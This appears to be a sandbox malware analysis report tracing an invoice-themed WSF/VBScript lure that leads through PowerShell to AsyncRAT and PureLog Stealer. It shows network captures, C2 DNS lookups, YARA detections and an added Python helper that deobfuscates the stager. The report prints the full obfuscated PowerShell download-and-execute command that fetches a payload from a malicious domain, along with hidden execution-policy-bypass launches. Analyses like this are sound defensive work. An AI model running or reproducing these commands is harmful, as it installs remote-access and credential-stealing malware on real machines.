Aug 29, 2024 19:45:54.388936996 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:45:54.393939972 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:45:54.612653017 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:45:54.663814068 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:45:54.743453026 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:45:54.744755983 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:45:54.749577999 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:45:54.749646902 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:45:54.754410028 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:02.820528030 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:46:02.826654911 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:02.826709032 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:46:02.832781076 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:03.005271912 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:03.054441929 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:46:03.131629944 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:03.132226944 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:46:03.137485027 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Aug 29, 2024 19:46:03.137541056 CEST | 49738 | 7707 | 192.168.2.4 | 104.243.37.177
Aug 29, 2024 19:46:03.142570019 CEST | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 19:41:53.429578066 CEST | 50576 | 53 | 192.168.2.4 | 1.1.1.1
Aug 29, 2024 19:41:53.665563107 CEST | 53 | 50576 | 1.1.1.1 | 192.168.2.4
Aug 29, 2024 19:42:19.618921041 CEST | 51671 | 53 | 192.168.2.4 | 1.1.1.1
Aug 29, 2024 19:42:20.246540070 CEST | 53 | 51671 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 19:41:53.429578066 CEST | 192.168.2.4 | 1.1.1.1 | 0xbf90 | Standard query (0) | afclifescience-tiurma.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 19:42:19.618921041 CEST | 192.168.2.4 | 1.1.1.1 | 0x3b5e | Standard query (0) | kareemovic11.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 19:41:53.665563107 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf90 | No error (0) | afclifescience-tiurma.com | | 192.185.141.13 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 19:42:20.246540070 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b5e | No error (0) | kareemovic11.duckdns.org | | 104.243.37.177 | A (IP address) | IN (0x0001) | false
                                    • afclifescience-tiurma.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 192.185.141.13 | 443 | 6216 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 17:41:54 UTC | 312 | OUT | GET /jxs.txt HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: afclifescience-tiurma.com
                                    Connection: Keep-Alive
2024-08-29 17:41:54 UTC | 278 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 17:41:54 GMT
                                    Server: nginx/1.23.4
                                    Content-Type: text/plain
                                    Content-Length: 526
                                    Last-Modified: Tue, 27 Aug 2024 17:37:43 GMT
                                    Accept-Ranges: bytes
                                    Vary: Accept-Encoding
                                    X-Server-Cache: true
                                    X-Proxy-Cache: MISS
                                    Connection: close
                                    2024-08-29 17:41:54 UTC526INData Raw: 0d 0a 44 69 6d 20 6f 64 71 65 6f 28 35 29 2c 20 71 51 73 78 59 2c 20 69 0d 0a 0d 0a 27 20 31 31 31 31 31 31 31 0d 0a 6f 64 71 65 6f 28 30 29 20 3d 20 22 5b 42 59 54 65 5b 5d 5d 3b 24 41 31 32 33 3d 27 49 65 58 28 4e 65 57 2d 4f 42 4a 65 43 54 20 4e 65 54 2e 57 27 3b 24 42 22 0d 0a 6f 64 71 65 6f 28 31 29 20 3d 20 22 34 35 36 3d 27 65 42 43 4c 49 65 4e 54 29 2e 44 4f 57 4e 4c 4f 27 3b 5b 42 59 54 65 5b 5d 5d 3b 24 43 37 38 39 3d 27 2d 22 0d 0a 6f 64 71 65 6f 28 32 29 20 3d 20 22 40 2d 40 2d 40 2d 24 2d 25 5e 28 27 27 68 74 74 70 73 3a 2f 2f 61 66 63 6c 69 66 65 73 63 69 65 6e 63 65 2d 74 69 75 72 6d 61 2e 22 0d 0a 6f 64 71 65 6f 28 33 29 20 3d 20 22 63 6f 6d 2f 72 6b 65 6d 2e 6a 70 67 27 27 29 27 2e 52 65 50 4c 41 43 65 28 27 2d 40 2d 40 2d 40 2d 24 2d 25
Data Ascii (line breaks restored from the 0d 0a pairs in the raw bytes; the dump is cut off inside the fourth fragment):
Dim odqeo(5), qQsxY, i

' 1111111
odqeo(0) = "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B"
odqeo(1) = "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-"
odqeo(2) = "@-@-@-$-%^(''https://afclifescience-tiurma."
odqeo(3) = "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%
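The jxs.txt body above is the VBScript stage that wscript.exe fetched. It keeps the PowerShell one-liner in a six-element string array (odqeo), mixes letter case inside the PowerShell tokens, and pads the payload URL with a decoy string '-@-@-@-$-%' that is stripped at run time by a .Replace() call whose arguments are cut off in the capture. Only the first four array elements survive in the dump, so the complete command is not on this page. As an added example that is not part of the report or of the malware, the helper below pulls such array fragments out of a VBScript, joins them in index order, lists any URL in the result and splits out the single-quoted PowerShell variables; the sample text is the decoded capture above and the regular expressions are mine.

```python
"""Reassemble string-array fragments from a VBScript stager.

Added example, not code from the report or the malware. The regexes and
the sample text (the decoded start of jxs.txt above, truncated where the
capture is) are assumptions of this helper.
"""
import re

# Constructed from the Data Ascii of the jxs.txt response above; the capture
# stops inside odqeo(3), so that line has no closing quote.
JXS_TXT = """
Dim odqeo(5), qQsxY, i

' 1111111
odqeo(0) = "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B"
odqeo(1) = "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-"
odqeo(2) = "@-@-@-$-%^(''https://afclifescience-tiurma."
odqeo(3) = "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%
"""

# name(index) = "body" with VBScript's "" escape; the closing quote is optional
# so a fragment cut off by the capture is still recovered.
FRAG_RE = re.compile(r'(\w+)\((\d+)\)\s*=\s*"((?:[^"\r\n]|"")*)"?')
# PowerShell single-quoted literal: $name='body', with '' as the escape for '.
PS_VAR_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def reassemble_fragments(vbs_text):
    """Return {array_name: joined string}, fragments joined in index order."""
    parts = {}
    for name, idx, body in FRAG_RE.findall(vbs_text):
        parts.setdefault(name, {})[int(idx)] = body.replace('""', '"')
    return {name: "".join(frag[i] for i in sorted(frag)) for name, frag in parts.items()}


def ps_string_vars(ps_text):
    """Single-quoted PowerShell variable literals, unescaped, in source order."""
    return {name: body.replace("''", "'") for name, body in PS_VAR_RE.findall(ps_text)}


def extract_urls(text):
    """Every http(s) URL in the text, stopping at quotes, parentheses or whitespace."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    joined = reassemble_fragments(JXS_TXT)["odqeo"]
    print(joined)
    print(extract_urls(joined))
    for name, val in ps_string_vars(joined).items():
        print(f"${name} = {val!r}  (case-folded: {val.lower()!r})")
```

Joining $A123 and $B456 and lower-casing the result gives iex(new-object net.webclient).downlo, the start of the familiar download-and-execute idiom, and $C789 holds the URL wrapped in the decoy; the rest of the command is not recoverable from the truncated dump and the helper does not guess at it.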


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 192.185.141.13 | 443 | 1344 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 17:41:57 UTC | 83 | OUT | GET /rkem.jpg HTTP/1.1
                                    Host: afclifescience-tiurma.com
                                    Connection: Keep-Alive
2024-08-29 17:41:57 UTC | 228 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 17:41:57 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade
                                    Last-Modified: Tue, 27 Aug 2024 17:35:04 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 723642
                                    Content-Type: image/jpeg
                                    2024-08-29 17:41:57 UTC7964INData Raw: 24 43 6f 6e 74 65 6e 74 20 3d 20 40 27 0d 0a 0d 0a 0d 0a 24 4d 6f 72 64 65 78 73 74 72 69 6e 67 5f 6f 6a 6a 20 3d 20 22 34 44 25 26 25 35 41 25 26 25 39 30 25 26 25 30 30 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 46 46 25 26 25 46 46 25 26 25 30 30 25 26 25 30 30 25 26 25 42 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 34 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25
Data Ascii (line breaks restored; the body is a PowerShell here-string, not a JPEG, despite the image/jpeg Content-Type):
$Content = @'


$Mordexstring_ojj = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 41 25 26 25 46 45 25 26 25 30 34 25 26 25 32 41 25 26 25 32 32 25 26 25 30 32 25 26 25 31 35 25 26 25 37 44 25 26 25 34 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 35 36 25 26 25 30 32 25 26 25 32 38 25 26 25 31 42 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 30 32 25 26 25 30 33 25 26 25 37 44 25 26 25 34 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 30 32 25 26 25 30 34 25 26 25 37 44 25 26 25 34 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 33 32 25 26 25 30 32 25 26 25 37 42 25 26 25 34 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 36 46 25 26 25 39 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 32 41 25 26 25 34 45 25 26 25 30 32 25 26
                                    Data Ascii: %00%&%0A%&%FE%&%04%&%2A%&%22%&%02%&%15%&%7D%&%44%&%00%&%00%&%04%&%2A%&%56%&%02%&%28%&%1B%&%00%&%00%&%0A%&%02%&%03%&%7D%&%46%&%00%&%00%&%04%&%02%&%04%&%7D%&%45%&%00%&%00%&%04%&%2A%&%32%&%02%&%7B%&%46%&%00%&%00%&%04%&%6F%&%96%&%00%&%00%&%06%&%2A%&%4E%&%02%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 31 34 25 26 25 38 30 25 26 25 31 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26 25 38 30 25 26 25 32 31 25 26 25 30 30 25 26 25 37 30 25 26 25 38 30 25 26 25 31 32 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26 25 38 34 25 26 25 32 31 25 26 25 30 30 25 26 25 37 30 25 26 25 38 30 25 26 25 31 33 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 32 41 25 26 25 30 30 25 26 25 31 42 25 26 25 33 30 25 26 25 30 37 25 26 25 30 30 25 26 25 46 31 25 26 25 30 32 25 26 25 30 30 25 26 25 30 30 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26 25 31 38 25 26 25 31 37 25 26 25 31 43 25 26 25 37 33 25 26 25 32 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26
                                    Data Ascii: %00%&%00%&%04%&%14%&%80%&%11%&%00%&%00%&%04%&%72%&%80%&%21%&%00%&%70%&%80%&%12%&%00%&%00%&%04%&%72%&%84%&%21%&%00%&%70%&%80%&%13%&%00%&%00%&%04%&%2A%&%00%&%1B%&%30%&%07%&%00%&%F1%&%02%&%00%&%00%&%03%&%00%&%00%&%11%&%18%&%17%&%1C%&%73%&%25%&%00%&%00%&%0A%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 36 41 25 26 25 36 46 25 26 25 35 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 32 30 25 26 25 35 30 25 26 25 43 33 25 26 25 30 30 25 26 25 30 30 25 26 25 38 44 25 26 25 34 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 33 25 26 25 30 35 25 26 25 33 38 25 26 25 32 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 32 38 25 26 25 30 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 35 25 26 25 31 37 25 26 25 36 46 25 26 25 34 45 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 32 36 25 26 25 32 38 25 26 25 30 38 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 31 25 26 25 30 35 25 26 25 31 36 25 26 25 31 31 25 26 25 30 34 25 26 25 36 46 25 26 25 34 46 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26
                                    Data Ascii: %6A%&%6F%&%51%&%00%&%00%&%0A%&%20%&%50%&%C3%&%00%&%00%&%8D%&%48%&%00%&%00%&%01%&%13%&%05%&%38%&%26%&%00%&%00%&%00%&%28%&%06%&%00%&%00%&%06%&%15%&%17%&%6F%&%4E%&%00%&%00%&%0A%&%26%&%28%&%08%&%00%&%00%&%06%&%11%&%05%&%16%&%11%&%04%&%6F%&%4F%&%00%&%00%&%0A%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 31 32 25 26 25 30 30 25 26 25 42 39 25 26 25 43 42 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 30 42 25 26 25 30 30 25 26 25 44 32 25 26 25 44 44 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 45 46 25 26 25 45 46 25 26 25 30 30 25 26 25 30 36 25 26 25 30 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 42 25 26 25 33 30 25 26 25 30 32 25 26 25 30 30 25 26 25 32 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 39 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26
                                    Data Ascii: %00%&%00%&%00%&%02%&%00%&%12%&%00%&%B9%&%CB%&%00%&%0D%&%00%&%00%&%00%&%00%&%02%&%00%&%0B%&%00%&%D2%&%DD%&%00%&%0D%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%EF%&%EF%&%00%&%06%&%01%&%00%&%00%&%01%&%1B%&%30%&%02%&%00%&%25%&%00%&%00%&%00%&%09%&%00%&%00%&%11%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 37 46 25 26 25 33 30 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 42 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 31 37 25 26 25 38 30 25 26 25 32 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 33 38 25 26 25 31 35 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 39 44 25 26 25 33 30 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 41 34 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 32 25 26 25 35 31 25 26 25 32 35 25 26 25 30 30 25 26 25 37 30 25 26 25 36 46 25 26 25 42 31 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 37 45 25 26 25 31 46 25 26 25 30 30 25 26 25 30 30 25 26 25 30 34 25 26 25 37 32 25 26
                                    Data Ascii: %00%&%00%&%06%&%72%&%7F%&%30%&%00%&%70%&%6F%&%B1%&%00%&%00%&%06%&%17%&%80%&%21%&%00%&%00%&%04%&%38%&%15%&%00%&%00%&%00%&%06%&%72%&%9D%&%30%&%00%&%70%&%6F%&%A4%&%00%&%00%&%06%&%72%&%51%&%25%&%00%&%70%&%6F%&%B1%&%00%&%00%&%06%&%7E%&%1F%&%00%&%00%&%04%&%72%&
                                    2024-08-29 17:41:57 UTC8000INData Raw: 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 33 39 25 26 25 30 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 36 25 26 25 36 46 25 26 25 33 36 25 26 25 30 30 25 26 25 30 30 25 26 25 30 41 25 26 25 44 43 25 26 25 30 37 25 26 25 32 41 25 26 25 30 30 25 26 25 30 30 25 26 25 30 31 25 26 25 31 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 32 25 26 25 30 30 25 26 25 30 36 25 26 25 30 30 25 26 25 31 44 25 26 25 32 33 25 26 25 30 30 25 26 25 30 44 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 30 30 25 26 25 31 42 25 26 25 33 30 25 26 25 30 34 25 26 25 30 30 25 26 25 38 41 25 26 25 30 33 25 26 25 30 30 25 26 25 30 30 25 26 25 31 30 25 26 25 30 30 25 26 25 30 30 25 26 25 31 31 25 26 25 30 32 25 26 25 31 36 25 26 25 33 46 25 26 25 37 35 25 26
                                    Data Ascii: %00%&%00%&%06%&%39%&%06%&%00%&%00%&%00%&%06%&%6F%&%36%&%00%&%00%&%0A%&%DC%&%07%&%2A%&%00%&%00%&%01%&%10%&%00%&%00%&%02%&%00%&%06%&%00%&%1D%&%23%&%00%&%0D%&%00%&%00%&%00%&%00%&%1B%&%30%&%04%&%00%&%8A%&%03%&%00%&%00%&%10%&%00%&%00%&%11%&%02%&%16%&%3F%&%75%&

                                    Target ID:0
                                    Start time:13:41:52
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"
                                    Imagebase:0x7ff731c60000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:13:41:54
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:13:41:54
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
                                    Imagebase:0x7ff731c60000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                                    Imagebase:0x7ff6cc330000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:13:42:00
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:13:42:13
                                    Start date:29/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x7ff7699e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:false

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acbe2e3d9b8cf909ffdb5f6985312e5f418f830418c6b8ba477eca0a3eef4ca2
                                      • Instruction ID: 14cb3a79c5a5800b4cee971b1288fb3bbb06ebe24e7054278c025af865a0b090
                                      • Opcode Fuzzy Hash: acbe2e3d9b8cf909ffdb5f6985312e5f418f830418c6b8ba477eca0a3eef4ca2
                                      • Instruction Fuzzy Hash: 54A11362A4FBC90FE7A6976848341A57FE1AF4B250B0A01FFD498CB1F3C9196D09C342
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a938acc912ae5f24db3d02c3f3d24d9f435cb1f21b9c3303b539d7cb77022a73
                                      • Instruction ID: 5ea0398ede0233deb66e8546380325cf9d8e6e761bcd4244b9bbf025ea0ae58c
                                      • Opcode Fuzzy Hash: a938acc912ae5f24db3d02c3f3d24d9f435cb1f21b9c3303b539d7cb77022a73
                                      • Instruction Fuzzy Hash: A0812672B0FB8A0FE7A99B6844701B876D2EF99250B1901FEC05DC71E7DE28AD058341
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
